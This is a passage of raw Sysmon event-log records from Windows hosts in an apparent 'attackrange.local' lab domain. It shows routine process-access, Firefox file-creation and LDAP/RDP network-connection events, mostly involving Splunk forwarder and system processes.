Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD077EE97A721B3FA6E7E15A840FB254,SHA256=2C3B156BB0EA9C54DED0BC9BAF3E14181EEEC4E382C46A4D901114290DBCBC96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.487{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B9-60EB-EB7C-00000000CF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.487{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:53.487{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.487{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:53.487{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.487{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2B9-60EB-EB7C-00000000CF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.487{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B9-60EB-EB7C-00000000CF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.482{466BC892-F2B9-60EB-EB7C-00000000CF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8AEC05EB6B578A79FA74D561A279507A,SHA256=D81027696BB44DF8596BE262978DCF9B09D1AE3B3D81370CE73DB43C27737D68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1A9B21082B0187C1488CE30BA455CC6A,SHA256=FABB4FFC11B736A6DECA37A2B61E530A8DE041E237F19561760EDFEDB4826526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E483D43A052D48F5B499011D5F02576E,SHA256=40A8751BCEB02BFD8052C20515264F56FB8296AB1CA6972BD3C08F34B6F60A87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C9655A72FBD2056C779BECAB29470A35,SHA256=EC9EE230E1DDA8EBAB1146AF3381481C1BA06795323160E856809FCD5F153ECD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FBAA04BC7D06E622D6F14078521B6D42,SHA256=5B7ABC468DBED5F072968E42B09AA099B03FC723AB589586951D53909C2F4498,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F63505866B8F3DEA89E97025CE408D63,SHA256=830D77DA9EA87D3329DDF5E67BF20906B00C6346ABCB757EB5014AC98540C3D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F0650E538054F9C3A6AC3BC9A414BAE3,SHA256=FF8FC7A30C74EF84E5375DDEBFD8790356DB0A90A5ECD990A984557894CCAD83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.286{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D318B26277E458D8BBCFA6BDB603D030,SHA256=C4D47F04634EA120C176548CE6035265A087390598D411FB1A82D61A57540DEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.285{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=66E2BB82E74BBCC452FAE6EED701AE3F,SHA256=0BCBCBA5A2F27CBDCA0F83CDDB3661FA7ACBBDD45FDEC9D330598662178C5086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:53.284{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1943E61F7167FD89431CA24B172EBFDF,SHA256=4FBD2B74781241AAC94F8E44518E982AAD3765C1514A77C1F063796DEF724A50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.282{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4EA1A58E8BF748457118E000CEBBA008,SHA256=065C3047B2D937A70E318BFC2F44DC3261E0B69335E46297E0DC7CDFD66F727C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.445{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50899-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001045891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.445{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50899-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001045890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.435{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50898-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 
354300x80000000000000001045889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.435{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50898-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001045923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.786{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8435CE5F5FDB571FA1233ED003A1085F,SHA256=ADD53E8B07ED7FA64A275804A5C2D6EFF66039982099FF27C7324833D8359801,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:54.098{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABAA14F28AB8A32D6D8C423EEA2284E7,SHA256=38918E8264CB9D6291929DE78CE0A8AEF6A8D4ADB669E870550E71CC9A81D11B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2BA-60EB-EC7C-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001045921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:54.165{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2BA-60EB-EC7C-00000000CF01}8628C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2BA-60EB-EC7C-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.151{466BC892-F2BA-60EB-EC7C-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:55.817{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9433F5118046846DBA501EDFC91271C1,SHA256=CE2137F7EC7AA4105996E2D9B2D571B4A5E8ED3A12A18A14C985D32AD59BFD6B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:54.237{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse122.226.223.195-59286-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:55.098{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62B871AEC74EA4857E2CC5BBB13CCA57,SHA256=08EC9FD9864ADB942F7AE31EE52DFE4F0BE8E7F41FE4F22664FECDDAE8D20AA8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:46.759{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50900-false10.0.1.12-8000- 23542300x80000000000000001045924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:55.164{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5FFD8A398F93F7E17CFB1F06096DD8A4,SHA256=65E120EC0BD575A31EA318AD0A28549CF7325F17CCA572EF5A253267AC957C1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:56.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95FB31B565B6BC58A1BF525711722313,SHA256=73C420E94C8F4AC57F9DB3CDB2110FA4590CE35BB0AC7CEBF9A8C2F8CF758882,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:56.582{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 